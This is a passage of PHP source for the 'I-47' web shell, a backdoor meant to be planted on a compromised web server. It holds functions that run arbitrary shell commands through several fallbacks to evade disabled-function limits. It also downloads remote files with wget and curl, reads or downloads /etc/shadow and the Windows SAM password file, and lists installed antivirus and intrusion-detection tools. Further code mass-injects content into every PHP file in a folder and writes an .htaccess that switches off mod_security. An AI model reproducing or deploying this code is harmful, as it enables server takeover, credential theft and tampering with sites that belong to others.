279. <tr>
280. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
281. </tr>
282. <tr>
283. <td><input type="submit" value="Execute" class="but"></td>
284. </tr>
285. </table>
286. </form>
287.  
288. <?php
289.  
290. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
291.  
292. mysql_select_db($dbname);
293. $pTable = mysql_list_tables( $dbname );
294.  
295. if( $pTable == 0 ) {
296. $msg = mysql_error();
297. echo "<h3>Error : $msg</h3><p>\n";
298. return;
299. }
300. $num = mysql_num_rows( $pTable );
301.  
302. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
303.  
304. for( $i = 0; $i < $num; $i++ )
305. {
306. $tablename = mysql_tablename( $pTable, $i );
307. $result = mysql_query("select * from $tablename");
308. $num_rows = mysql_num_rows($result);
309. echo "<tr>\n";
310. echo "<td>\n";
311. echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'><font color=red size=3>$tablename</font></a> ($num_rows)\n";
312. echo "</td>\n";
313. echo "<td>\n";
314. echo "<a href='$self?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
315. echo "</td>\n";
316. echo "<td>\n";
317. echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'>Data</a>\n";
318. echo "</td>\n";
319. echo "<td>\n";
320. echo "<a href='$self?action=empty&dbname=$dbname&tablename=$tablename'>Empty</a>\n";
321. echo "</td>\n";
322. echo "<td>\n";
323. echo "<a href='$self?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
324. echo "</td>\n";
325. echo "</tr>\n";
326. }
327.  
328. echo "</table></form>";
329. mysql_close($mysqlHandle);
330. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
331. }
332.  
333.  
334. function paramexe($n, $v)
335. {
336. $v = trim($v);
337. if($v)
338. {
339. echo '<span><font color=red size=3>' . $n . ': </font></span>';
340. if(strpos($v, "\n") === false)
341. echo '<font color=red size=2>' . $v . '</font><br>';
342. else
343. echo '<pre class=ml1><font color=lime size=3>' . $v . '</font></pre>';
344. }
345. }
346.  
347. $dir = getcwd();
348.  
349. if(isset($_GET['dir']))
350. {
351. $dir = base64_decode($_GET['dir']);
352. }
353.  
354.  
355. function dis()
356. {
357. if(!ini_get('disable_functions'))
358. {
359. echo "None";
360. }
361. else
362. {
363. echo @ini_get('disable_functions');
364. }
365. }
366.  
367. function mycmdexec($cmd)
368. {
369. global $disablefunc;
370. $result = "";
371. if (!empty($cmd))
372. {
373. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
374. elseif (($result = "$cmd") !== FALSE) {}
375. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
376. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
377. elseif (is_resource($fp = popen($cmd,"r")))
378. {
379. $result = "";
380. while(!feof($fp)) {$result .= fread($fp,1024);}
381. pclose($fp);
382. }
383. }
384. return $result;
385. }
386.  
387. function rrmdir($dir)
388. {
389. if (is_dir($dir)) // ensures that we actually have a directory
390. {
391. $objects = scandir($dir); // gets all files and folders inside
392. foreach ($objects as $object)
393. {
394. if ($object != '.' && $object != '..')
395. {
396. if (is_dir($dir . '/' . $object))
397. {
398. // if we find a directory, do a recursive call
399. rrmdir($dir . '/' . $object);
400. }
401. else
402. {
403. // if we find a file, simply delete it
404. unlink($dir . '/' . $object);
405. }
406. }
407. }
408. // the original directory is now empty, so delete it
409. rmdir($dir);
410. }
411. }
412.  
413. function godir($dir)
414. {
415. //echo $dir;
416.  
417. $zip = new ZipArchive();
418. $filename= basename($dir) . '.zip';
419. // open archive
420. if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE)
421. {
422. die ("Could not open archive");
423. }
424. else
425. echo "fdg";
426. if (is_dir($dir)) // ensures that we actually have a directory
427. {
428. $objects = scandir($dir); // gets all files and folders inside
429. foreach ($objects as $object)
430. {
431. if ($object != '.' && $object != '..')
432. {
433. if (is_dir($dir . '\\' . $object))
434. {//echo $dir . '/' . $object;
435. // if we find a directory, do a recursive call
436. godir($dir . '\\' . $object);
437. }
438. else
439. {
440. // if we find a file, simply add it
441. $zip->addFile($dir . '\\' . $object) or die ("ERROR: Could not add file: $key");
442. }
443. }
444. }
445. // the original directory is now empty, so delete it
446. $zip->addFile($dir) or die ("ERROR: Could not add file: $key");
447. }
448. }
449.  
450.  
451.  
452. function which($pr)
453. {
454. $path = execmd("which $pr");
455. if(!empty($path))
456. return trim($path);
457. else
458. return trim($pr);
459. }
460.  
461. function cf($f,$t)
462. {
463. $w=@fopen($f,"w") or @function_exists('file_put_contents');
464. if($w)
465. {
466. @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t)));
467. @fclose($w);
468. }
469. }
470.  
471. function remotedownload($cmd,$url)
472. {
473. $namafile = basename($url);
474. switch($cmd)
475. {
476. case 'wwget':
477. execmd(which('wget')." ".$url." -O ".$namafile);
478. break;
479. case 'wlynx':
480. execmd(which('lynx')." -source ".$url." > ".$namafile);
481. break;
482. case 'wfread' :
483. execmd($wurl,$namafile);
484. break;
485. case 'wfetch' :
486. execmd(which('fetch')." -o ".$namafile." -p ".$url);
487. break;
488. case 'wlinks' :
489. execmd(which('links')." -source ".$url." > ".$namafile);
490. break;
491. case 'wget' :
492. execmd(which('GET')." ".$url." > ".$namafile);
493. break;
494. case 'wcurl' :
495. execmd(which('curl')." ".$url." -o ".$namafile);
496. break;
497. default:
498. break;
499. }
500. return $namafile;
501. }
502.  
503. function magicboom($text)
504. {
505. if (!get_magic_quotes_gpc())
506. return $text;
507. return stripslashes($text);
508. }
509.  
510. function checkproxyhost()
511. {
512. $host = getenv("HTTP_HOST");
513. $filename = '/tmp/.setan/xh';
514. if (file_exists($filename))
515. {
516. $_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
517. } else {
518. $_POST['proxyhostmsg']="</br></br><center><font color=red size=4><b>Failed!</b></font></br></br><font color=red size=3>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</font></br></br></center>";
519. }
520. }
521.  
522. ##################################
523. function execmd($cmd,$d_functions="None")
524. {
525. if($d_functions=="None")
526. {
527. $ret=passthru($cmd);
528. return $ret;
529. }
530. $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
531. $d_functions=str_replace(" ","",$d_functions);
532. $dis_funcs=explode(",",$d_functions);
533. foreach($funcs as $safe)
534. {
535. if(!in_array($safe,$dis_funcs))
536. {
537. if($safe=="exec")
538. {
539. $ret=@exec($cmd);
540. $ret=join("\n",$ret);
541. return $ret;
542. }
543. elseif($safe=="system")
544. {
545. $ret=@system($cmd);
546. return $ret;
547. }
548. elseif($safe=="passthru")
549. {
550. $ret=@passthru($cmd);
551. return $ret;
552. }
553. elseif($safe=="shell_exec")
554. {
555. $ret=@shell_exec($cmd);
556. return $ret;
557. }
558. elseif($safe=="popen")
559. {
560. $ret=@popen("$cmd",'r');
561. if(is_resource($ret))
562. {
563. while(@!feof($ret))
564. $read.=@fgets($ret);
565. @pclose($ret);
566. return $read;
567. }
568. return -1;
569. }
570. elseif($safe="proc_open")
571. {
572. $cmdpipe=array(
573. 0=>array('pipe','r'),
574. 1=>array('pipe','w')
575. );
576. $resource=@proc_open($cmd,$cmdpipe,$pipes);
577. if(@is_resource($resource))
578. {
579. while(@!feof($pipes[1]))
580. $ret.=@fgets($pipes[1]);
581. @fclose($pipes[1]);
582. @proc_close($resource);
583. return $ret;
584. }
585. return -1;
586. }
587. }
588. }
589. return -1;
590. }
591.  
592. function getDisabledFunctions()
593. {
594. if(!ini_get('disable_functions'))
595. {
596. return "None";
597. }
598. else
599. {
600. return @ini_get('disable_functions');
601. }
602. }
603.  
604. function getFilePermissions($file)
605. {
606.  
607. $perms = fileperms($file);
608.  
609. if (($perms & 0xC000) == 0xC000) {
610. // Socket
611. $info = 's';
612. } elseif (($perms & 0xA000) == 0xA000) {
613. // Symbolic Link
614. $info = 'l';
615. } elseif (($perms & 0x8000) == 0x8000) {
616. // Regular
617. $info = '-';
618. } elseif (($perms & 0x6000) == 0x6000) {
619. // Block special
620. $info = 'b';
621. } elseif (($perms & 0x4000) == 0x4000) {
622. // Directory
623. $info = 'd';
624. } elseif (($perms & 0x2000) == 0x2000) {
625. // Character special
626. $info = 'c';
627. } elseif (($perms & 0x1000) == 0x1000) {
628. // FIFO pipe
629. $info = 'p';
630. } else {
631. // Unknown
632. $info = 'u';
633. }
634.  
635. // Owner
636. $info .= (($perms & 0x0100) ? 'r' : '-');
637. $info .= (($perms & 0x0080) ? 'w' : '-');
638. $info .= (($perms & 0x0040) ?
639. (($perms & 0x0800) ? 's' : 'x' ) :
640. (($perms & 0x0800) ? 'S' : '-'));
641.  
642. // Group
643. $info .= (($perms & 0x0020) ? 'r' : '-');
644. $info .= (($perms & 0x0010) ? 'w' : '-');
645. $info .= (($perms & 0x0008) ?
646. (($perms & 0x0400) ? 's' : 'x' ) :
647. (($perms & 0x0400) ? 'S' : '-'));
648.  
649. // World
650. $info .= (($perms & 0x0004) ? 'r' : '-');
651. $info .= (($perms & 0x0002) ? 'w' : '-');
652. $info .= (($perms & 0x0001) ?
653. (($perms & 0x0200) ? 't' : 'x' ) :
654. (($perms & 0x0200) ? 'T' : '-'));
655.  
656. return $info;
657.  
658. }
659.  
660.  
661. function yourip()
662. {
663. echo $_SERVER["REMOTE_ADDR"];
664. }
665. function odi()
666. {
667. $od = @ini_get("open_basedir");
668. echo $od;
669. }
670. function phpver()
671. {
672. $pv=@phpversion();
673. echo $pv;
674. }
675. function serverip()
676. {
677. echo getenv('SERVER_ADDR');
678. }
679. function serverport()
680. {
681. echo $_SERVER['SERVER_PORT'];
682. }
683. function cip()
684. {
685. echo $_SERVER["SERVER_NAME"];
686. }
687. function safe()
688. {
689. global $sm;
690. return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
691. }
692. function browse()
693. {
694. $brow= $_SERVER["HTTP_USER_AGENT"];
695. print($brow);
696. }
697. function serveradmin()
698. {
699. echo $_SERVER['SERVER_ADMIN'];
700. }
701. function mysq()
702. {
703. echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");
704. }
705. function systeminfo()
706. {
707. echo php_uname();
708. }
709. function curlinfo()
710. {
711. echo function_exists('curl_version')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
712. }
713. function oracleinfo()
714. {
715. echo function_exists('ocilogon')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
716. }
717. function mysqlinfo()
718. {
719. echo function_exists('mysql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
720. }
721. function mssqlinfo()
722. {
723. echo function_exists('mssql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
724. }
725. function postgresqlinfo()
726. {
727. echo function_exists('pg_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
728. }
729. function softwareinfo()
730. {
731. echo getenv("SERVER_SOFTWARE");
732. }
733. function download()
734. {
735. $frd=$_GET['download'];
736.  
737. header("Content-type: application/octet-stream");
738. header("Content-length: ".filesize($frd));
739. header("Content-disposition: attachment; filename=\"".basename($frd)."\";");
740. readfile($frd);
741.  
742. exit;
743.  
744. }
745.  
746. function HumanReadableFilesize($size)
747. {
748.  
749. $mod = 1024;
750.  
751. $units = explode(' ','B KB MB GB TB PB');
752. for ($i = 0; $size > $mod; $i++)
753. {
754. $size /= $mod;
755. }
756.  
757. return round($size, 2) . ' ' . $units[$i];
758. }
759.  
760. function showDrives()
761. {
762. global $self;
763. foreach(range('A','Z') as $drive)
764. {
765. if(is_dir($drive.':\\'))
766. {
767. ?>
768. <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
769. <?php echo $drive.":\\" ?>
770. </a>
771. <?php
772. }
773. }
774. }
775. function diskSpace()
776. {
777. echo HumanReadableFilesize(disk_total_space("/"));
778. }
779. function freeSpace()
780. {
781. echo HumanReadableFilesize(disk_free_space("/"));
782. }
783.  
784. function thiscmd($p)
785. {
786. $path = myexe('which ' . $p);
787. if(!empty($path))
788. return $path;
789. return false;
790. }
791.  
792. function split_dir()
793. {
794. $de=explode("/",getcwd());
795. $del=$de[0];
796. for($count=0;$count<sizeof($de);$count++)
797. {
798. $imp=$imp.$de[$count].'/';
799.  
800. echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
801. }
802.  
803. }
804.  
805. function mysecinfo()
806. {
807.  
808. function myparam($n, $v)
809. {
810. $v = trim($v);
811. if($v)
812. {
813. echo '<span><font color =red size=3>' . $n . ': </font></span>';
814. if(strpos($v, "\n") === false)
815. echo '<font color =lime size=3>' . $v . '</font><br>';
816. else
817. echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
818. }
819. }
820.  
821. myparam('Server software', @getenv('SERVER_SOFTWARE'));
822. if(function_exists('apache_get_modules'))
823. myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
824. myparam('Open base dir', @ini_get('open_basedir'));
825. myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
826. myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
827. $temp=array();
828. if(function_exists('mysql_get_client_info'))
829. $temp[] = "MySql (".mysql_get_client_info().")";
830. if(function_exists('mssql_connect'))
831. $temp[] = "MSSQL";
832. if(function_exists('pg_connect'))
833. $temp[] = "PostgreSQL";
834. if(function_exists('oci_connect'))
835. $temp[] = "Oracle";
836. myparam('Supported databases', implode(', ', $temp));
837. echo '<br>';
838.  
839. if($GLOBALS['os'] == 'Linux') {
840. myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='$self?passwd'>[view]</a>":'no');
841. myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
842. myparam('OS version', @file_get_contents('/proc/version'));
843. myparam('Distr name', @file_get_contents('/etc/issue.net'));
844. myparam('Where is Perl?', myexe('whereis perl'));
845. myparam('Where is Python?', myexe('whereis python'));
846. myparam('Where is gcc?', myexe('whereis gcc'));
847. myparam('Where is apache?', myexe('whereis apache'));
848. myparam('CPU?', myexe('cat /proc/cpuinfo'));
849. myparam('RAM', myexe('free -m'));
850. myparam('Mount options', myexe('cat /etc/fstab'));
851. myparam('User Limits', myexe('ulimit -a'));
852.  
853.  
854. if(!$GLOBALS['safe_mode']) {
855. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
856. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
857. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
858. echo '<br>';
859. $temp=array();
860. foreach ($userful as $item)
861. if(thiscmd($item))
862. $temp[] = $item;
863. myparam('Userful', implode(', ',$temp));
864. $temp=array();
865. foreach ($danger as $item)
866. if(thiscmd($item))
867. $temp[] = $item;
868. myparam('Danger', implode(', ',$temp));
869. $temp=array();
870. foreach ($downloaders as $item)
871. if(thiscmd($item))
872. $temp[] = $item;
873. myparam('Downloaders', implode(', ',$temp));
874. echo '<br/>';
875. myparam('HDD space', myexe('df -h'));
876. myparam('Hosts', @file_get_contents('/etc/hosts'));
877.  
878. }
879. } else {
880. echo "<font color=red size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $_SERVER["WINDIR"]."\\repair\sam><b><font color=lime size=3>Download password file</font></b></a><br>";
881. echo "<font color=red size=3>Config Files : </font><a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\hosts><b><font color=lime size=3>[ Hosts ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\\networks><b><font color=lime size=3>[ Local Network Map ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\lmhosts.sam><b><font color=lime size=3>[ lmhosts ]</font></b></a><br>";
882. $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
883. echo "<font color=red size=3>Open Base Dir : </font><font color=lime size=3>" . $base . "</font><br>";
884. myparam('OS Version',myexe('ver'));
885. myparam('Account Settings',myexe('net accounts'));
886. myparam('User Accounts',myexe('net user'));
887. }
888. echo '</div>';
889. }
890.  
891.  
892.  
893. function myexe($in) {
894. $out = '';
895. if (function_exists('exec')) {
896. @exec($in,$out);
897. $out = @join("\n",$out);
898. } elseif (function_exists('passthru')) {
899. ob_start();
900. @passthru($in);
901. $out = ob_get_clean();
902. } elseif (function_exists('system')) {
903. ob_start();
904. @system($in);
905. $out = ob_get_clean();
906. } elseif (function_exists('shell_exec')) {
907. $out = shell_exec($in);
908. } elseif (is_resource($f = @popen($in,"r"))) {
909. $out = "";
910. while(!@feof($f))
911. $out .= fread($f,1024);
912. pclose($f);
913. }
914. return $out;
915. }
916.  
917. function exec_all($command)
918. {
919.  
920. $output = '';
921. if(function_exists('exec'))
922. {
923. exec($command,$output);
924. $output = join("\n",$output);
925. }
926.  
927. else if(function_exists('shell_exec'))
928. {
929. $output = shell_exec($command);
930. }
931.  
932. else if(function_exists('popen'))
933. {
934. $handle = popen($command , "r"); // Open the command pipe for reading
935. if(is_resource($handle))
936. {
937. if(function_exists('fread') && function_exists('feof'))
938. {
939. while(!feof($handle))
940. {
941. $output .= fread($handle, 512);
942. }
943. }
944. else if(function_exists('fgets') && function_exists('feof'))
945. {
946. while(!feof($handle))
947. {
948. $output .= fgets($handle,512);
949. }
950. }
951. }
952. pclose($handle);
953. }
954.  
955.  
956. else if(function_exists('system'))
957. {
958. ob_start(); //start output buffering
959. system($command);
960. $output = ob_get_contents(); // Get the ouput
961. ob_end_clean(); // Stop output buffering
962. }
963.  
964. else if(function_exists('passthru'))
965. {
966. ob_start(); //start output buffering
967. passthru($command);
968. $output = ob_get_contents(); // Get the ouput
969. ob_end_clean(); // Stop output buffering
970. }
971.  
972. else if(function_exists('proc_open'))
973. {
974. $descriptorspec = array(
975. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
976. );
977. $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
978. if(is_resource($handle))
979. {
980. if(function_exists('fread') && function_exists('feof'))
981. {
982. while(!feof($pipes[1]))
983. {
984. $output .= fread($pipes[1], 512);
985. }
986. }
987. else if(function_exists('fgets') && function_exists('feof'))
988. {
989. while(!feof($pipes[1]))
990. {
991. $output .= fgets($pipes[1],512);
992. }
993. }
994. }
995. pclose($handle);
996. }
997.  
998. return(htmlspecialchars($output));
999.  
1000. }
1001.  
1002.  
1003. ?>
1004.  
1005. <?php
1006.  
1007.  
1008. $pinfo = "info";
1009. if(isset($_GET["com"]))
1010. {
1011. phpinfo();
1012. }
1013. else
1014. {
1015. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font color='lime'>ON</font>":"<font color='red'>OFF</font>";
1016. $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1017. ?>
1018. <div align="center">
1019. <a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">I-47 v1.2: By Arjun </font></a>
1020.  
1021. </div>
1022. <hr>
1023.  
1024. <table cellpadding="0" style="width:100%;">
1025. <tr>
1026. <td colspan="3" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
1027. <td style="width:15%;"><a href="<?php $_SERVER['PHP_SELF'];?>?com=info" target="_blank"><font class="txt"><i>Software Info</i></font></a></td>
1028. </tr>
1029. <tr>
1030. <td style="width:85%;" colspan="3">Software : <font class="txt"><?php softwareinfo(); ?></font></td>
1031. <td style="width:15%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
1032. </tr>
1033.  
1034. <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
1035. <td style="width:75%;" colspan="3">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
1036. </tr><?php } ?>
1037. <tr>
1038. <td style="width:20%;">Disk Space : <font class="txt"><?php diskSpace(); ?></font></td>
1039. <td style="width:20%;">Free Space : <font class="txt"><?php freeSpace(); ?></font></td>
1040.  
1041. <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
1042. <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
1043. </tr>
1044.  
1045. <tr>
1046. <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
1047. <td style="width:20%;">Current Directory : <font color="#009900"><?php
1048. $d = str_replace("\\",$directorysperator,$dir);
1049. if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
1050. $d = str_replace("\\\\","\\",$d);
1051. $dispd = htmlspecialchars($d);
1052. $pd = $e = explode($directorysperator,substr($d,0,-1));
1053. $i = 0;
1054. foreach($pd as $b)
1055. {
1056. $t = '';
1057. $j = 0;
1058. foreach ($e as $r)
1059. {
1060. $t.= $r.$directorysperator;
1061. if ($j == $i) {break;}
1062. $j++;
1063. }
1064.  
1065.  
1066. $href='dir='.base64_encode($t);
1067.  
1068. echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
1069. $i++;
1070. }
1071.  
1072. ?></font></td>
1073. <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
1074. <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
1075.  
1076. </tr>
1077. </table>
1078.  
1079.  
1080. <table border="3" width="100%;" cellpadding="2">
1081. <tr>
1082. <td style="border:none;"><a href="<?php echo $self;?>"><font color="#FF0000">Home</font></a></td><font color="#1B1B1B" size="0">
1083. <td style="border:none;"><a href="<?php echo $self.'?symlinkserver'?>"><font color="#FF0000">Symlink</font></a></td>
1084. <td style="border:none;"><a href="<?php echo $self.'?forum'?>"><font color="#FF0000">Forum</font></a></td>
1085. <td style="border:none;"><a href="<?php echo $self.'?secinfo'?>"><font color="#FF0000">Sec. Info</font></a></td>
1086. <td style="border:none;"><a href="<?php echo $self.'?injector'?>"><font color="#FF0000">Code Inject</font></a></td>
1087. <td style="border:none;"><a href="<?php echo $self.'?bypass';?>"><font color="#FF0000">Bypassers</font></a></td>
1088. <td style="border:none;"><a href="<?php echo $self.'?fuzz'?>"><font color="#FF0000">Server Fuzzer</font></a></td>
1089. <td style="border:none;"><a href="<?php echo $self.'?zone'?>"><font color="#FF0000">Zone-h</font></a></td>
1090. <td style="border:none;"><a href="<?php echo $self.'?phpproxy'?>"><font color="#FF0000">Proxy</font></a></td>
1091. <td style="border:none;"><a href="<?php echo $self.'?dos';?>"><font color="#FF0000">DoS</font></a></td>
1092. <td style="border:none;"><a href="<?php echo $self.'?mailbomb'?>"><font color="#FF0000">Mail</font></a></td>
1093. <td style="border:none;"><a href="<?php echo $self.'?phpc';?>"><font color="#FF0000">PHP</font></a></td>
1094. <td style="border:none;"><a href="<?php echo $self.'?exploit'?>"><font color="#FF0000">Exploit</font></a></td>
1095. <td style="border:none;"><a href="<?php echo $self.'?connect'?>"><font color="#FF0000">Connect</font></a></td>
1096. <td style="border:none;"><a href="<?php echo $self.'?database'?>"><font color="#FF0000">SQL</font></a></td>
1097. <td style="border:none;"><a href="<?php echo $self.'?about'?>"><font color="#FF0000">About</font></a></td>
1098. <td style="border:none;"><a href="<?php echo $self.'?selfkill'?>" onClick="if(confirm('Are You Sure You Want To Kill This Shell ?')){return true;}else{return false;}"><font color="#FF0000">SelfKill</font></a></td>
1099. <td style="border:none;"><a href="<?php echo $self.'?logout'?>"><font color="#FF0000">LogOut</font></a></td>
1100. </tr>
1101. </table>
1102.  
1103.  
1104. <table align="center" style="width:95%; background-color:#0C0C0C; -moz-border-radius:25px;"><br>
1105. <tr>
1106. <form method="GET" action="<?php echo $self; ?>">
1107. <td style="width:35%;" align="right"> &nbsp;Present Working Directory : </td><td style="width:20%;"><input name="dir" class="box" style="width:300px;" value="<?php if($dir == null){echo getcwd();} else { echo $dir; } ?>"/></td>
1108. <td><input type="submit" value=" Go " class="but" /></td><td align="right"><?php if($os == "Linux") { ?>
1109. <a href="<?php echo $self.'?downloadit'; ?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
1110. </form>
1111. </tr>
1112. </table>
1113.  
1114. <?php
1115.  
1116. if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
1117. {
1118. //$dir = $_GET['dir'];
1119. $filetype = $_POST['filetype'];
1120. //$message = $_GET['message'];
1121.  
1122. $mode = "a"; //default mode
1123.  
1124.  
1125. // Modes Begin
1126.  
1127. if($_POST['mode'] == 'Apender')
1128. {
1129. $mode = "a";
1130. }
1131. if($_POST['mode'] == 'Overwriter')
1132. {
1133. $mode = "w";
1134. }
1135.  
1136. if ($_POST['filetype'] == 'php')
1137. {
1138. if (is_dir($_POST['pathtomass']))
1139. {
1140. $lolinject = $_POST['injectthis'];
1141. foreach (glob($_POST['pathtomass'] . $directorysperator . "*.php") as $injectj00)
1142. {
1143. $fp=fopen($injectj00,$mode);
1144. if (fputs($fp,$lolinject)){
1145. echo '<br><font color=lime size=3>'.$injectj00.' was injected<br></font>';
1146. } else {
1147. echo '<font color=red size=3>failed to inject '.$injectj00.'</font>';
1148. }
1149. }
1150. } else
1151. { //end if inputted dir is real -- if not, show an ugly red error
1152. echo '<b><font color=red>'.$_POST['pathtomass'].' is not available!</font></b>';
1153. } // end if inputted dir is real, for real this time
1154. } // end if confirmation to mass sploit is php only
1155. } // end if massbrowsersploit is called
1156.  
1157.  
1158.  
1159. if(isset($_GET['to']) && isset($_GET['file']))
1160. {
1161. if(!rename($_GET['file'], $_GET['to']))
1162. {
1163. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1164. header("Location:$loc");
1165. ob_end_flush();
1166.  
1167. }
1168. else
1169. {
1170. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1171. header("Location:$loc");
1172. ob_end_flush();
1173.  
1174. }
1175. }
1176.  
1177.  
1178. if(isset($_POST["changeperms"]))
1179. {
1180. if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
1181. {
1182. $perms = 0;
1183. for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
1184. $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
1185. if(@chmod($_POST['myfilename'],$perms))
1186. echo "<center><blink><font size=3 color=lime>File Permissions Changed Successfully</font></blink></center>";
1187. else
1188. echo "<center><blink><font size=3 color=red>Cannot Change File Permissions</font></blink></center>";
1189. }
1190. }
1191.  
1192. $setuploadvalue = 0;
1193. if(isset($_POST['u']))
1194. {
1195. $path = $_REQUEST['path'];
1196. if(is_dir($path))
1197. {
1198. $uploadedFilePath = $_FILES['uploadfile']['name'];
1199. //echo $uploadedFilePath;
1200. $tempName = $_FILES['uploadfile']['tmp_name'];
1201. //echo $tempName;
1202. if($os == "Windows")
1203. $uploadPath = $path . $directorysperator . $uploadedFilePath;
1204. else if($os == "Linux")
1205. $uploadPath = $path . $directorysperator . $uploadedFilePath;
1206. if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
1207. {
1208. echo "<center><font color=lime size=3><blink>File uploaded to $uploadPath</blink></font></center>";
1209. //header("Location:");
1210. }
1211. else
1212. {
1213. echo "<center><font color=red size=3><blink>Failed to upload file to $uploadPath</blink></font></center>";
1214. }
1215. }
1216. }
1217.  
1218. if(isset($_POST['createdir']))
1219. {
1220. if(!mkdir($_POST['createfolder']))
1221. echo "Failed To create";
1222. }
1223. if(isset($_POST['createmyfile'])&&isset($_POST['filecontent']))
1224. {
1225. $content = $_POST['filecontent'];
1226. $file_pointer = fopen($_POST['filecreator'], "w+");
1227. fwrite($file_pointer, $content);
1228. fclose($file_pointer);
1229. $loc = $_SERVER['REQUEST_URI'];
1230. header("Location:$loc");
1231. ob_end_flush();
1232. }
1233.  
1234.  
1235. //Turn Safe Mode Off
1236.  
1237. if(getDisabledFunctions() != "None" || safe() != "OFF")
1238. {
1239. $file_pointer = fopen(".htaccess", "w+");
1240. fwrite($file_pointer, "<IfModule mod_security.c>
1241. SecFilterEngine Off
